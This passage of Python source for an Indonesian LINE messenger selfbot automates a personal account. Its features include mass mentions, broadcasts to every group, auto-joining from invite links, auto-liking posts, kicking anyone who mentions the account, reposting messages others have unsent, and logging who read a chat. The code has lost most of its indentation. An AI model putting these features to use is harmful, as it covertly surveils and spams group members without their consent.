else:
settings["keluar"] = spl
line.sendMessage(msg.to, "LeaveMessage diubah jadi :\n\n{}".format(str(spl)))
elif text.lower() == "cek leavemsg":
if msg._from in lineMID:
line.sendMessage(msg.to, "LeaveMessage :\n\n" + str(settings["keluar"]))
#=============RESPON1=============================
elif 'Set respon1 ' in msg.text:
if sender in lineMID:
spl = msg.text.replace('Set respon1 ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti Respon1")
else:
settings["tag"] = spl
line.sendMessage(msg.to, "Respon1 Text Diubah Menjadi :\n\n{}".format(str(spl)))
elif text.lower() == "cek respon1":
if sender in lineMID:
line.sendMessage(msg.to, "Respon1 Text Kamu :\n\n" + str(settings["tag"]))
#=============RESPON2=============================
elif 'Set respon2 ' in msg.text:
if sender in lineMID:
spl = msg.text.replace('Set respon2 ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti Respon2")
else:
settings["tag2"] = spl
line.sendMessage(msg.to, "Respon2 Image Diubah Menjadi :\n\n{}".format(str(spl)))
elif text.lower() == "cek respon2":
if sender in lineMID:
line.sendMessage(msg.to, "Respon2 TagImage Kamu :\n\n" + str(settings["tag2"]))
#=============RESPON3============================
elif 'Set respon3 ' in msg.text:
if sender in lineMID:
spl = msg.text.replace('Set respon3 ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti Respon3")
else:
settings["tag3"] = spl
line.sendMessage(msg.to, "Respon3 PM Diubah Menjadi :\n\n{}".format(str(spl)))
elif text.lower() == "cek respon3":
if sender in lineMID:
line.sendMessage(msg.to, "Respon3 PM Kamu :\n\n" + str(settings["tag3"]))
#=============RESPON3============================
elif 'Set autolike ' in msg.text:
if sender in lineMID:
spl = msg.text.replace('Set autolike ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti autolike")
else:
wait["comment1"] = spl
line.sendMessage(msg.to, "Autocommand like diubah menjadi :\n\n{}".format(str(spl)))
#=============RESPON3============================
elif 'Set sidertext ' in msg.text:
if sender in lineMID:
spl = msg.text.replace('Set sidertext ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti Sider")
else:
settings["mention"] = spl
line.sendMessage(msg.to, "Sider Diubah Menjadi :\n\n{}".format(str(spl)))
elif text.lower() == "cek sidertext":
if sender in lineMID:
line.sendMessage(msg.to, "Sider Kamu :\n\n" + str(settings["mention"]))
elif 'Set responpc ' in msg.text:
if sender in lineMID:
spl = msg.text.replace('Set responpc ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti ResponPc")
else:
settings["responpc"] = spl
line.sendMessage(msg.to, "Respon Pc diganti jadi :\n\n".format(str(spl)))
elif text.lower() == "cek responpc":
if sender in lineMID:
line.sendMessage(msg.to, "Respon Pc mu :\n\n"+ str(settings["responpc"]))
elif text.lower() == "cek autolike":
if sender in lineMID:
line.sendMessage(msg.to, "AutoLike mu :\n\n"+ str(wait["comment1"]))
elif text.lower() == 'gcreator':
group = line.getGroup(to)
GS = group.creator.mid
line.sendContact(to, GS)
elif text.lower() == 'gid':
gid = line.getGroup(to)
line.sendMessage(to, "[ID Group : ]\n" + gid.id)
elif text.lower() == 'gpict':
group = line.getGroup(to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
line.sendImageWithURL(to, path)
elif text.lower() == 'gname':
gid = line.getGroup(to)
line.sendMessage(to, "[Nama Group : ]\n" + gid.name)
elif text.lower() == 'gurl':
if msg.toType == 2:
group = line.getGroup(to)
if group.preventedJoinByTicket == False:
ticket = line.reissueGroupTicket(to)
line.sendMessage(to, "[ Group Ticket ]\nhttps://line.me/R/ti/g/{}".format(str(ticket)))
else:
line.sendMessage(to, "Grup qr tidak terbuka silahkan buka terlebih dahulu dengan perintah {}openqr".format(str(settings["keyCommand"])))
elif text.lower() == 'link on':
if msg.toType == 2:
group = line.getGroup(to)
if group.preventedJoinByTicket == False:
line.sendMessage(to, "Grup qr sudah terbuka")
else:
group.preventedJoinByTicket = False
line.updateGroup(group)
line.sendMessage(to, "Berhasil membuka grup qr")
elif text.lower() == 'link off':
if msg.toType == 2:
group = line.getGroup(to)
if group.preventedJoinByTicket == True:
line.sendMessage(to, "Grup qr sudah tertutup")
else:
group.preventedJoinByTicket = True
line.updateGroup(group)
line.sendMessage(to, "Berhasil menutup grup qr")
elif text.lower() == 'reject':
gid = line.getGroupIdsInvited()
for i in gid:
line.rejectGroupInvitation(i)
if wait["lang"] == "JP":
line.sendMessage(msg.to,"Reject GroupInvited Done")
else:
line.sendMessage(msg.to,"Done")
elif text.lower() == 'cancel':
if msg._from in lineMID:
if msg.toType == 2:
group = line.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
line.cancelGroupInvitation(msg.to,[_mid])
line.sendMessage(msg.to,"I pretended to cancel and canceled.")
elif text.lower() == 'ginfo':
group = line.getGroup(to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Tidak ditemukan"
if group.invitee is None:
gPending = "0"
else:
gPending = str(len(group.invitee))
if group.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(line.reissueGroupTicket(group.id)))
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
ret_ = "╔══[ Group Info ]"
ret_ += "\n╠ Nama Group : {}".format(str(group.name))
ret_ += "\n╠ ID Group : {}".format(group.id)
ret_ += "\n╠ Pembuat : {}".format(str(gCreator))
ret_ += "\n╠ Jumlah Member : {}".format(str(len(group.members)))
ret_ += "\n╠ Jumlah Pending : {}".format(gPending)
ret_ += "\n╠ Group Qr : {}".format(gQr)
ret_ += "\n╠ Group Ticket : {}".format(gTicket)
ret_ += "\n╚══[ Finish ]"
line.sendMessage(to, str(ret_))
line.sendImageWithURL(to, path)
elif text.lower() == 'memlist':
if msg.toType == 2:
group = line.getGroup(to)
ret_ = "╔══[ Member List ]"
no = 0 + 1
for mem in group.members:
ret_ += "\n╠ {}. {}".format(str(no), str(mem.displayName))
no += 1
ret_ += "\n╚══[ Total {} ]".format(str(len(group.members)))
line.sendMessage(to, str(ret_))
elif text.lower() == 'groups':
groups = line.groups
ret_ = "╔══[ Group List ]"
no = 0 + 1
for gid in groups:
group = line.getGroup(gid)
ret_ += "\n╠ {}. {} | {}".format(str(no), str(group.name), str(len(group.members)))
no += 1
ret_ += "\n╚══[ Total {} Groups ]".format(str(len(groups)))
line.sendMessage(to, str(ret_))
elif msg.text in ["Autolike"]:
if sender in lineMID:
print ("[Command]Like executed")
line.sendMessage(msg.to,"Auto Like Is running")
try:
autolike()
except:
pass
elif "/ti/g/" in msg.text.lower():
if settings["autoJoinTicket"] == True:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = line.findGroupByTicket(ticket_id)
line.acceptGroupInvitationByTicket(group.id,ticket_id)
line.sendMessage(to, "Berhasil masuk ke group %s" % str(group.name))
elif text.lower() == 'tagmem' or text.lower() == 'tag' or text.lower() == 'hi' or text.lower() == 'dkz' or text.lower() == 'cling' or text.lower() == 'hem' or text.lower() == 'absen' or text.lower() == 'muach' or text.lower() == 'hai' or text.lower() == "dor":
group = line.getGroup(msg.to)
members = [contact.mid for contact in group.members]
tags = []
for i in range(0, len(members), 20):
tags.append(list(members[i:i+20]))
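            # Mention the members in chunks of 20 per message; the for-else footer below
            # is sent once after every chunk has gone out.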
for t in tags:
msg = ttypes.Message(to=to)
tst ="❨✪❩ ᴅᴋᴢ ᴍᴇɴᴛɪᴏɴs ❨✪❩ \n\n"
tst += u''
s=len(tst)
d=[]
for i in range(len(t)):
d.append({"S":str(s), "E" :str(s+4), "M":t[i]})
s += 5
tst +=u'@jek\n'
msg.text = tst.rstrip()
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
line.talk.sendMessage(0,msg)
jp = line.getContact(lineMID).displayName
else:
line.sendMessage(to,"╭════════════════╮\n❨✪❩ ᴍᴇɴᴛɪᴏɴᴇs ʙʏ : " + jp+"\n╰════════════════╯")
#==============================================================================#
elif text.lower() == 'kalender':
tz = pytz.timezone("Asia/Makassar")
timeNow = datetime.now(tz=tz)
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
hr = timeNow.strftime("%A")
bln = timeNow.strftime("%m")
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
                    bln = bulan[int(bln) - 1]
readTime = hasil + ", " + timeNow.strftime('%d') + " - " + bln + " - " + timeNow.strftime('%Y') + "\nJam : [ " + timeNow.strftime('%H:%M:%S') + " ]"
line.sendMessage(msg.to, readTime)
elif text.lower() == "remove chat":
if msg._from in lineMID:
try:
line.removeAllMessages(op.param2)
line.sendMessage(msg.to,"Chat dibersihkan...")
except:
pass
elif msg.text.startswith("Music "):
try:
query = msg.text.replace("Music ","")
query = urllib.parse.quote(query)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib.request.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
dl=("https://www.youtube.com" + results['href'])
vid = pafy.new(dl)
stream = vid.streams
for s in stream:
vin = s.url
hasil = 'Hasil Info Music:\n\n'
hasil += vid.title
hasil +='\n» Penulis : ' + str(vid.author)
hasil +='\n» Durasi : ' + str(vid.duration)
hasil +='\n» Suka : ' + str(vid.likes)
hasil +='\n» Penonton : ' + str(vid.viewcount)
hasil +='\n» Rating : ' +str(vid.rating)
hasil +='\n» Diterbitkan : ' + str(vid.published)
hasil +='\n» Channel : Jeckydkz.music.com'
line.sendMessage(msg.to,hasil)
line.sendAudioWithURL(msg.to,vin)
line.sendVideoWithURL(msg.to,vin)
print (" Yt-mp3 Succes open")
except:
line.sendMessage(msg.to, "Maaf Keyword anda salah")
elif "kalkulator" in msg.text.lower():
try:
sep = msg.text.split(" ")
cal = msg.text.replace(sep[0] + " ","")
result = requests.get("http://calcatraz.com/calculator/api?c="+urllib.parse.quote(cal))
data = result.text
line.sendMessage(to,"Hasil:\n\n"+ cal+ " = " +str(data))
except Exception as error:
logError(error)
line.sendMessage(to, str(error))
elif "instagram" in msg.text.lower():
sep = text.split(" ")
search = text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://www.instagram.com/{}/?__a=1".format(search))
try:
data = json.loads(r.text)
ret_ = "╔══[ Profile Instagram ]"
ret_ += "\n╠ Nama : {}".format(str(data["user"]["full_name"]))
ret_ += "\n╠ Username : {}".format(str(data["user"]["username"]))
ret_ += "\n╠ Bio : {}".format(str(data["user"]["biography"]))
ret_ += "\n╠ Pengikut : {}".format(format_number(data["user"]["followed_by"]["count"]))
ret_ += "\n╠ Diikuti : {}".format(format_number(data["user"]["follows"]["count"]))
if data["user"]["is_verified"] == True:
ret_ += "\n╠ Verifikasi : Sudah"
else:
ret_ += "\n╠ Verifikasi : Belum"
if data["user"]["is_private"] == True:
ret_ += "\n╠ Akun Pribadi : Iya"
else:
ret_ += "\n╠ Akun Pribadi : Tidak"
ret_ += "\n╠ Total Post : {}".format(format_number(data["user"]["media"]["count"]))
ret_ += "\n╚══[ https://www.instagram.com/{} ]".format(search)
path = data["user"]["profile_pic_url_hd"]
line.sendImageWithURL(to, str(path))
line.sendMessage(to, str(ret_))
except:
line.sendMessage(to, "Pengguna tidak ditemukan")
elif msg.text.lower().startswith("movie"):
try:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
apiKey = "zbYyMGhWy06DDsSHeUAK3GHQkEbCL8"
api = requests.get("https://farzain.xyz/api/film.php?apikey={}&id={}".format(str(apiKey), str(search)))
data = api.text
data = json.loads(data)
if data["status"] == "success":
anu = "[ Result Film ]"
anu += "\nTitle : {}".format(str(data["Title"]))
anu += "\nYear : {}".format(str(data["Year"]))
anu += "\nRated : {}".format(str(data["Rated"]))
anu += "\nReleased : {}".format(str(data["Released"]))
anu += "\nDuration : {}".format(str(data["Runtime"]))
anu += "\nGenre : {}".format(str(data["Genre"]))
path = str(data["Poster"])
line.sendImageWithURL(msg.to, str(path))
line.sendMessage(msg.to, str(anu))
else:
sendMentionV2(msg.to, "Maaf @!,hasil pencarin tidak ditemukan", [sender])
except Exception as error:
line.sendMessage(msg.to, str(error))
#___________BROADCAST_______________
elif msg.text.lower().startswith("broadcast "):
sep = text.split(" ")
txt = text.replace(sep[0] + " ","")
groups = line.groups
for group in groups:
line.sendMessage(group, "Broadcast:\n\n{}".format(str(txt)))
elif text.startswith("Led "):
separate = text.split(" ")
teks = text.replace(separate[0] + " ","")
url = "https://ari-api.herokuapp.com/led?text="+teks+"&sign=PB"
line.sendImageWithURL(to, url)
elif text.startswith("Poster "):
separate = text.split(" ")
teks = text.replace(separate[0] + " ","")
url = "https://ari-api.herokuapp.com/neon?text="+teks+"&color=blue"
line.sendImageWithURL(to, url)
elif text.startswith("Fs "):
sep = text.split(" ")
txt = text.replace(sep[0] + " ","")
url = "https://rest.farzain.com/api/special/fansign/cosplay/cosplay.php?apikey=nda123&text={}".format(txt)
line.sendImageWithURL(to, url)
elif text.startswith("Coba "):
sep = text.split(" ")
txt = text.replace(sep[0] + " ","")
url = "https://rest.farzain.com/api/cooltext.php?text={}&apikey=nda123".format(txt)
line.sendImageWithURL(to, url)
elif text.startswith("Anu "):
txt = text.replace("Anu ","")
url = "https://rest.farzain.com/api/special/fansign/indo/viloid.php?apikey=nda123&text={}".format(txt)
line.sendImageWithURL(to, url)
elif text.lower() == "kontak me":
line.sendMessage(to, "Nama mu : " + line.getContact(sender).displayName + "\n\nBio mu : \n" + line.getContact(sender).statusMessage + "\n\nLink profil mu :\nhttp://dl.profile.line-cdn.net/" + line.getContact(sender).pictureStatus)
line.sendMessage(to, "Mid mu : \n" + sender)
elif text.lower() == "info me":
status = ["Status Kehidupan : Menjomblo", "Status Kehidupan : Menjones", "Status Kehidupan : Menikah", "Status Kehidupan : Menyendiri"]
muka = ["Wajah : Jelek dekil", "Wajah : Cantik", "Wajah : Bengkok", "Wajah : Item mutung", "Wajah : Rata"]
jenis = ["Jenis kelamin : Laki - laki", "Jenis kelamin : Perempuan", "Jenis kelamin : Waria", "Jenis kelamin : Tidak punya"]
line.sendMessage(to, "Nama : " + line.getContact(msg._from).displayName + "\n" + random.choice(jenis) + "\n" + random.choice(muka) + "\n" + random.choice(status))
elif text.startswith("Smule "):
proses = text.split(" ")
urutan = text.replace(proses[0] + " ","")
count = urutan.split("-")
search = str(count[0])
r = requests.get("https://www.smule.com/"+search+"/performances/json")
data = json.loads(r.text)
if len(count) == 1:
no = 0
ret_ = "Record Smule:\n"
for aa in data["list"]:
no += 1
ret_ += "\n" + str(no) + ". " + str(aa["title"])
ret_ += "\n\nSelanjutnya ketik: smule {}-nomor\nuntuk melihat detailnya. ".format(str(search))
line.sendMessage(msg.to,ret_)
elif len(count) == 2:
try:
num = int(count[1])
b = data["list"][num - 1]
smule = str(b["web_url"])
c = "Judul Oc: "+str(b["title"])
c += "\nPembuat: "+str(b["owner"]["handle"])
c += "\nTotal like: "+str(b["stats"]["total_loves"])+" like"
c += "\nTotal comment: "+str(b["stats"]["total_comments"])+" comment"
c += "\nStatus VIP: "+str(b["owner"]["is_vip"])
c += "\nStatus Oc: "+str(b["message"])
c += "\nCreated Oc: {}".format(b["created_at"][:10])
c += "\nDidengarkan: {}".format(b["stats"]["total_listens"])+" orang"
hasil = "Detail Record\n\n"+str(c)
dl = str(b["cover_url"])
line.sendImageWithURL(msg.to,dl)
line.sendMessage(msg.to, hasil, {'AGENT_NAME': ' URL Smule','AGENT_LINK': 'https://www.smule.com/{}'.format(str(b['owner']['handle'])),'AGENT_ICON': 'https://png.icons8.com/color/50/000000/speaker.png' })
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
r = s.get("https://sing.salon/smule-downloader/?url=https://www.smule.com{}".format(urllib.parse.quote(smule)))
data = BeautifulSoup(r.content, 'html5lib')
get = data.select("a[href*=https://www.smule.com/redir?]")[0]
title = data.findAll('h2')[0].text
imag = data.select("img[src*=https://www.smule.com/redir?]")[0]
if 'Smule.m4a' in get['download']:
line.sendMessage(msg.to,"Type: Audio\n\nPlease wait for audio...")
line.sendAudioWithURL(msg.to, get['href'])
else:
line.sendMessage(msg.to,"Type: Video\n\nPlease wait for video...")
line.sendVideoWithURL(msg.to, get['href'])
except Exception as e:
line.sendMessage(msg.to,"Result Error:\n"+str(e))
elif text.startswith("Ceksmule "):
sep = text.split(" ")
search = text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://www.smule.com/{}".format(urllib.parse.quote(search)))
gunakan = BeautifulSoup(r.content, 'html5lib')
for getinfosmule in gunakan.findAll('script',{'type':'text/javascript'})[1]:
getJsonSmule = re.search(r'DataStore.Pages.Profile\s*=\s*(\{.+\})\s*;', getinfosmule).group(1)
data = json.loads(getJsonSmule)
for smuleProfile in data:
ret_ = "Profile Smule:\n"
ret_ += "\n• Id Smule: @{}".format(str(data["user"]["handle"]))
ret_ += "\n• Total Rekaman: {} record".format(str(data["user"]["num_performances"]))
ret_ += "\n• Pengikut: {} orang".format(str(data["user"]["followers"]))
ret_ += "\n• Mengikuti: {} orang".format(str(data["user"]["followees"]))
ret_ += "\n• Bio: {}".format(str(data["user"]["blurb"]))
if data["user"]["is_verified"] == True:
ret_ += "\n• Verifikasi: Sudah"
else:
ret_ += "\n• Verifikasi: Belum"
if data["user"]["is_vip"] == True:
ret_ += "\n• Akun VIP: Iya"
else:
ret_ += "\n• Akun VIP: Tidak"
path = data["user"]["pic_url"]
name = "INFO PROFILE SMULE"
url = "https://www.smule.com/{}".format(search)
iconlink = data["user"]["pic_url"]
line.sendMessage(to, str(ret_))
line.sendImageWithURL(msg.to, str(path))
#======
elif text.lower() == '.bye':
if msg.toType == 2:
ginfo = line.getGroup(msg.to)
try:
line.sendMessage(msg.to,"Bye! " + str(ginfo.name))
line.leaveGroup(msg.to)
except:
pass
#____________________________________
elif "image: " in msg.text.lower():
separate = msg.text.split(" ")
search = msg.text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("http://rahandiapi.herokuapp.com/imageapi?key=betakey&q={}".format(urllib.parse.quote(search)))
data = r.text
data = json.loads(data)
if data["result"] != []:
items = data["result"]
path = random.choice(items)
a = items.index(path)
b = len(items)
line.sendImageWithURL(to, str(path))
elif "youtube" in msg.text.lower():
if msg._from in lineMID:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
best = vid.getbest()
best.resolution, best.extension
for s in stream:
me = best.url
hasil = ""
title = "💿 Judul 🎼〘 " + vid.title + " 〙"
author = '\n\n✏ Author : ' + str(vid.author)
durasi = '\n📟 Duration : ' + str(vid.duration)
suka = '\n👍 Likes : ' + str(vid.likes)
rating = '\n⭐ Rating : ' + str(vid.rating)
deskripsi = '\n📋 Deskripsi : ' + str(vid.description)
line.sendVideoWithURL(msg.to, me)
line.sendMessage(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
line.sendMessage(msg.to,str(e))
elif msg.contentType == 7:
if settings["checkSticker"] == True:
stk_id = msg.contentMetadata['STKID']
stk_ver = msg.contentMetadata['STKVER']
pkg_id = msg.contentMetadata['STKPKGID']
ret_ = "╔══[ Sticker Info ]"
ret_ += "\n╠ STICKER ID : {}".format(stk_id)
ret_ += "\n╠ STICKER PACKAGES ID : {}".format(pkg_id)
ret_ += "\n╠ STICKER VERSION : {}".format(stk_ver)
ret_ += "\n╠ STICKER URL : line://shop/detail/{}".format(pkg_id)
ret_ += "\n╚══[ Finish ]"
line.sendMessage(to, str(ret_))
elif settings["contact"] == True:
msg.contentType = 0
line.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = line.getContact(msg.contentMetadata["mid"])
try:
cu = line.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
line.sendMessage(to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = line.getContact(msg.contentMetadata["mid"])
try:
cu = line.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
line.sendMessage(to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 1:
if settings["changePicture"] == True:
path = line.downloadObjectMsg(msg_id)
settings["changePicture"] = False
line.updateProfilePicture(path)
line.sendMessage(to, "Berhasil mengubah foto profile")
if msg.toType == 2:
if to in settings["changeGroupPicture"]:
path = line.downloadObjectMsg(msg_id)
settings["changeGroupPicture"].remove(to)
line.updateGroupPicture(to, path)
line.sendMessage(to, "Berhasil mengubah foto group")
elif msg.contentType == 16:
                # derive the home id and post id from the post URL (mirrors the op.type 26 handler further below)
                url = msg.contentMetadata["postEndUrl"]
                line.likePost(url[25:58], url[66:], likeType=1001)
                line.createComment(url[25:58], url[66:], "AutoLike by: Team Dkz Protection ")
#==============================================================================#
if op.type == 17:
if op.param1 in welcome:
if op.param2 in lineMID:
pass
ginfo = line.getGroup(op.param1)
contact = line.getContact(op.param2).picturePath
image = 'http://dl.profile.line.naver.jp'+contact
welcomeMembers(op.param1, [op.param2])
line.sendImageWithURL(op.param1, image)
if op.type == 13:
if lineMID in op.param3:
if settings["autojj"] == "wl":
if op.param2 in periksa["wl"]:
line.acceptGroupInvitation(op.param1)
else:
if settings['autorejc'] == True:
line.rejectGroupInvitation(op.param1)
else:
pass
elif settings["autojj"] == "all":
line.acceptGroupInvitation(op.param1)
else:
if settings['autorejc'] == True:
line.rejectGroupInvitation(op.param1)
else:
pass
if op.type == 26:
if wait["Mute"] == False:
print ("[ 26 ] RECEIVE MESSAGE")
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0:
if sender != line.profile.mid:
to = sender
if settings["autoBalas"] == True:
if msg.toType == 0:
line.sendChatChecked(sender,msg_id)
contact = line.getContact(sender)
mids = [contact.mid]
text = "[ Auto Respon ]\n\nHallo @!\nMohon Maaf Saya Sedang Sibuk, Ini Adalah Pesan Otomatis, Jika Ada Yang Penting Mohon Hubungi Saya Nanti, Terimakasih..."
                                sendMentionV2(sender, text, mids)
else:
to = receiver
else:
to = receiver
if msg.contentType == 0:
if settings["autoRead"] == True:
line.sendChatChecked(to, msg_id)
if to in read["readPoint"]:
if sender not in read["ROM"][to]:
read["ROM"][to][sender] = True
if sender in settings["mimic"]["target"] and settings["mimic"]["status"] == True and settings["mimic"]["target"][sender] == True:
text = msg.text
if text is not None:
line.sendMessage(msg.to,text)
if settings["unsendMessage"] == True:
try:
msg = op.message
if msg.toType == 0:
line.log("[{} : {}]".format(str(msg._from), str(msg.text)))
else:
line.log("[{} : {}]".format(str(msg.to), str(msg.text)))
msg_dict[msg.id] = {"text": msg.text, "from": msg._from, "createdTime": msg.createdTime, "contentType": msg.contentType, "contentMetadata": msg.contentMetadata}
except Exception as error:
logError(error)
if msg.contentType == 0:
if text is None:
return
if "/ti/g/" in msg.text.lower():
if settings["autoJoinTicket"] == True:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = line.findGroupByTicket(ticket_id)
line.acceptGroupInvitationByTicket(group.id,ticket_id)
line.sendMessage(to, "Berhasil join ke group %s" % str(group.name))
#___________________RESPON TEXT__________________
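            # Auto-reply when this account is mentioned in a group: autoRespon sends a text,
            # autoResponImage adds the sender's picture, autoResponPm answers in private,
            # and responPc sends a private reply for chats listed in responPc.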
if msg.contentType == 0 and sender not in lineMID and msg.toType == 2:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if lineMID in mention["M"]:
if settings["autoRespon"]:
contact = line.getContact(sender)
line.sendMessage(to, settings["tag"])
break
#___________________RESPON KICKTAG_________________
if msg.contentType == 0 and sender not in lineMID and msg.toType == 2:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if lineMID in mention["M"]:
if settings["autoKick"]:
contact = line.getContact(sender)
jp = line.getContact(sender).displayName
line.sendMessage(to, "Please SHUT THE FUCK UP")
line.kickoutFromGroup(msg.to,[sender])
break
#___________________RESPON IMAGE_________________
if msg.contentType == 0 and sender not in lineMID and msg.toType == 2:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if lineMID in mention["M"]:
if settings["autoResponImage"]:
contact = line.getContact(sender)
anu = contact.displayName
path = "http://dl.profile.line.naver.jp/" + contact.pictureStatus
line.sendMessage(to, settings["tag2"])
line.sendImageWithURL(msg.to, str(path))
break
#___________________RESPON PM________________
if msg.contentType == 0 and sender not in lineMID and msg.toType == 2:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if lineMID in mention["M"]:
if settings["autoResponPm"]:
contact = line.getContact(sender)
line.sendMessage(sender, settings["tag3"])
break
#___________________________
if msg.contentType == 0 and sender not in lineMID and msg.toType == 2:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if lineMID in mention["M"]:
if msg.to in responPc:
G = line.getGroup(to)
contact = line.getContact(sender)
anu = contact.displayName
#sid = str(tikel["sid"])
#spkg = str(tikel["spkg"])
anu = contact.displayName
line.sendMessage(sender, settings["responpc"])
#line.sendSticker(sender, spkg, sid)
break
if op.type == 26:
print ("[ 26 ] RECEIVE MESSAGE")
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0:
if sender != line.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if settings["autoRead"] == True:
line.sendChatChecked(to, msg_id)
if to in read["readPoint"]:
if sender not in read["ROM"][to]:
read["ROM"][to][sender] = True
if sender in settings["mimic"]["target"] and settings["mimic"]["status"] == True and settings["mimic"]["target"][sender] == True:
text = msg.text
if text is not None:
line.sendMessage(msg.to,text)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
line.likePost(url[25:58], url[66:], likeType=1001)
line.createComment(url[25:58], url[66:], wait["comment1"])
line.sendMessage(msg.to, "╭═════════════════╮\n » ᴅᴇᴛᴇᴄᴛ ᴘᴏsᴛ ʙʏ: ᴛᴇᴀᴍ ᴅᴋᴢ\n » ᴀᴜᴛᴏʟɪᴋᴇ ʜᴀs ʙᴇᴇɴ sᴇɴᴛ\n╰═════════════════╯")
if op.type == 65:
if wait["unsend"] == True:
try:
at = op.param1
msg_id = op.param2
if msg_id in msg_dict1:
if msg_dict1[msg_id]["from"]:
                            ginfo = line.getGroup(at)
                            ryan = line.getContact(msg_dict1[msg_id]["from"])
                            ret_ = "「 Sticker Dihapus 」\n"
                            ret_ += "• Pengirim : {}".format(str(ryan.displayName))
                            ret_ += "\n• Nama Grup : {}".format(str(ginfo.name))
                            ret_ += "\n• Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict1[msg_id]["createdTime"])))
                            ret_ += "\n{}".format(str(msg_dict1[msg_id]["text"]))
                            line.sendMessage(at, str(ret_))
                            line.sendImage(at, msg_dict1[msg_id]["data"])
                            del msg_dict1[msg_id]
except Exception as e:
print(e)
#==============================================================================#
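        # op.type 55 (read receipt): the first block records readers for the readPoint
        # feature, the second powers the sider/lurker report started with "sider on".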
if op.type == 55:
print ("[ 55 ] NOTIFIED READ MESSAGE")
try:
if op.param1 in read['readPoint']:
if op.param2 in read['readMember'][op.param1]:
pass
else:
